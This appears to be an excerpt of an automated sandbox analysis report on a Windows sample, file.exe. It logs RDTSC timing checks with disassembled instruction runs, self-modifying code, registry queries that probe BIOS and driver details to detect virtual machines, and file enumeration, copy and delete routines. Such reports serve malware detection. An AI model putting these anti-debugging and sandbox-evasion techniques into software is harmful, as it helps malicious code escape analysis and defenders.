              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC95E second address: 10CC97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FAE58F8563Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC97B second address: 10CC9B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85886h 0x00000007 jno 00007FAE58F85876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAE58F85883h 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC9B5 second address: 10CC9CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85644h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D115A second address: 10D1160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D1160 second address: 10D1166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D5A3B second address: 10D5A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D5A45 second address: 10D5A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3250 second address: 10E3254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3254 second address: 10E3258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E749D second address: 10E74B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAE58F8587Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E74B2 second address: 10E74B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6FE5 second address: 10E6FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6FE9 second address: 10E7013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85644h 0x00000007 jmp 00007FAE58F85642h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7013 second address: 10E7024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAE58F8587Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED28C second address: 10ED290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED290 second address: 10ED296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5484 second address: 10F548E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAE58F85636h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAF8B second address: 10FAFA7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAE58F85880h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAFA7 second address: 10FAFC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85645h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB0ED second address: 10FB107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAE58F85876h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAE58F8587Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB107 second address: 10FB10C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB10C second address: 10FB116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB24C second address: 10FB27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8563Dh 0x00000009 jmp 00007FAE58F85640h 0x0000000e jmp 00007FAE58F8563Dh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB27F second address: 10FB285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB285 second address: 10FB289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB289 second address: 10FB291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB291 second address: 10FB297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB297 second address: 10FB29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB436 second address: 10FB449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8563Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB449 second address: 10FB44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB44D second address: 10FB45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FAE58F85648h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB45B second address: 10FB474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8587Ch 0x00000009 pushad 0x0000000a jbe 00007FAE58F85876h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB474 second address: 10FB495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAE58F85636h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAE58F85643h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBA41 second address: 10FBA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBA47 second address: 10FBA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007FAE58F85636h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11023F8 second address: 1102411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85885h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102411 second address: 1102424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAE58F8563Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102424 second address: 110242A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110213F second address: 1102144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11122C3 second address: 11122CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11122CE second address: 11122D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110DC57 second address: 110DC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1135218 second address: 1135236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85643h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134475 second address: 1134487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAE58F85882h 0x0000000a jng 00007FAE58F85876h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11348A7 second address: 11348B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11348B5 second address: 11348D1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FAE58F85882h 0x00000010 jnl 00007FAE58F85876h 0x00000016 ja 00007FAE58F85876h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11348D1 second address: 11348DE instructions: 0x00000000 rdtsc 0x00000002 je 00007FAE58F85638h 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11348DE second address: 11348E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134EFD second address: 1134F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113ACB4 second address: 113ACD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F85886h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113ACD2 second address: 113AD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAE58F85645h 0x0000000a jmp 00007FAE58F8563Fh 0x0000000f push edx 0x00000010 jmp 00007FAE58F85647h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113A7E3 second address: 113A7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113C785 second address: 113C78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113C78B second address: 113C796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57102A0 second address: 57102FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 movsx edi, ax 0x00000009 jmp 00007FAE58F85644h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, 3E800840h 0x0000001b pushfd 0x0000001c jmp 00007FAE58F85649h 0x00000021 adc esi, 5B985C46h 0x00000027 jmp 00007FAE58F85641h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57102FD second address: 5710303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5710303 second address: 5710321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAE58F85642h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5710321 second address: 5710327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5710327 second address: 571032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57103B7 second address: 57103CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAE58F85882h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57103CD second address: 57103D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57103D1 second address: 57103E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAE58F8587Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57103E6 second address: 57103EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57103EC second address: 57103F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57103F0 second address: 57103F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 105C45D second address: 105C463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EBF8F4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EBF9CC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 10DB634 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_2-27073)
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_2-25891)
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.7 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C818A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C83910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C81250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C81269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C8E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C8CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C7DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C82390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C7DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C823A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C84B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 2_2_00C84B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
